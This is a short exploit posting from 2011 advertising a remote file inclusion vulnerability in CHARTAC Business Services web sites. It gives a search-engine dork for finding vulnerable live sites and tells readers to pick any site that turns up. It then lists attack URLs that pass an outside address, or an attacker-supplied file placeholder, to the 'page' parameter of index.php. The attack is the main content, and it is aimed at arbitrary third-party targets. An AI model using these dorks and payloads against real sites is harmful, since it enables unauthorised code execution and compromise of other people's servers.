#(+)Exploit Title:  CHARTAC BUSINESS SERVICES Remote File Inclusion Vulnerability
#(+)Author   : ^Xecuti0n3r
#(+) Date    : 22.04.2011
#(+) Hour    : 13:37 PM
#(+) E-mail  :  xecuti0n3r()yahoo.com
#(+) dork    : intext:"CHARTAC. All rights reserved."
#(+) Category  : Web Apps [RFi]

____________________________________________________________________
____________________________________________________________________

Choose any site that comes up when you enter the dork intext:"CHARTAC. All rights reserved." in search engine


    *Remote File Inclusion*
	
	
#      [+]http://site.com/v2/index.php?page=http://google.com
#      [+]http://site.com/v2/index.php?page=[RFi]
#      [+]http://127.0.0.1/v2/index.php?page=[RFi]
____________________________________________________________________
____________________________________________________________________

########################################################################
(+)Exploit Coded by: ^Xecuti0n3r 
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
########################################################################